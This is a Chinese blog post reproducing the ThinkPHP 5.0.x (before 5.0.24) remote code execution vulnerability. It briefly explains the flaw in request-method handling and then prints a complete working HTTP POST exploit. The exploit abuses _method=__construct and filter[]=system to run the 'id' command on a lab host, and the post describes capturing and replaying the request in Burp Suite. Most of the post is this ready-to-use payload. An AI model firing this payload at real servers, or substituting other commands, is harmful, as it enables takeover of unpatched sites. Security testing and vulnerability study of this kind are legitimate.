ThinkPHP5 5.0.23远程执行代码漏洞 ThinkPHP5-RCE

本文详细介绍了ThinkPHP5.0版本的一个严重安全漏洞,该漏洞允许攻击者通过特定的payload进行远程代码执行。利用流程包括burpuite抓包、修改payload并重放,最终导致代码执行且有回显。漏洞存在于请求方法的不当处理,影响版本为5.0(低于5.0.24)。提供了复现漏洞的payload,以及参考资料链接,帮助读者理解漏洞细节。
摘要由CSDN通过智能技术生成

ThinkPHP5 5.0.23远程执行代码漏洞

by ADummy

0x00利用路线

​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显

0x01漏洞介绍

​ ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.0.24)中,框架在获取请求方法时会错误地对其进行处理,这使攻击者可以调用Request类的任何方法,从而通过特定的利用链导致RCE漏洞。

0x02漏洞复现

payload1:

POST /index.php?s=captcha HTTP/1.1

Host: 192.168.15.130:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: JSESSIONID=1v1yqdlc1zren12n0cs4wcfwgp; PHPSESSID=1bb9e7bee96c5ec0fe76b552020c8719

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

默认页面
在这里插入图片描述

burpsuite改包,id被执行,有回显
在这里插入图片描述

0x03参考资料

https://blog.csdn.net/nicesa/article/details/106247668

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值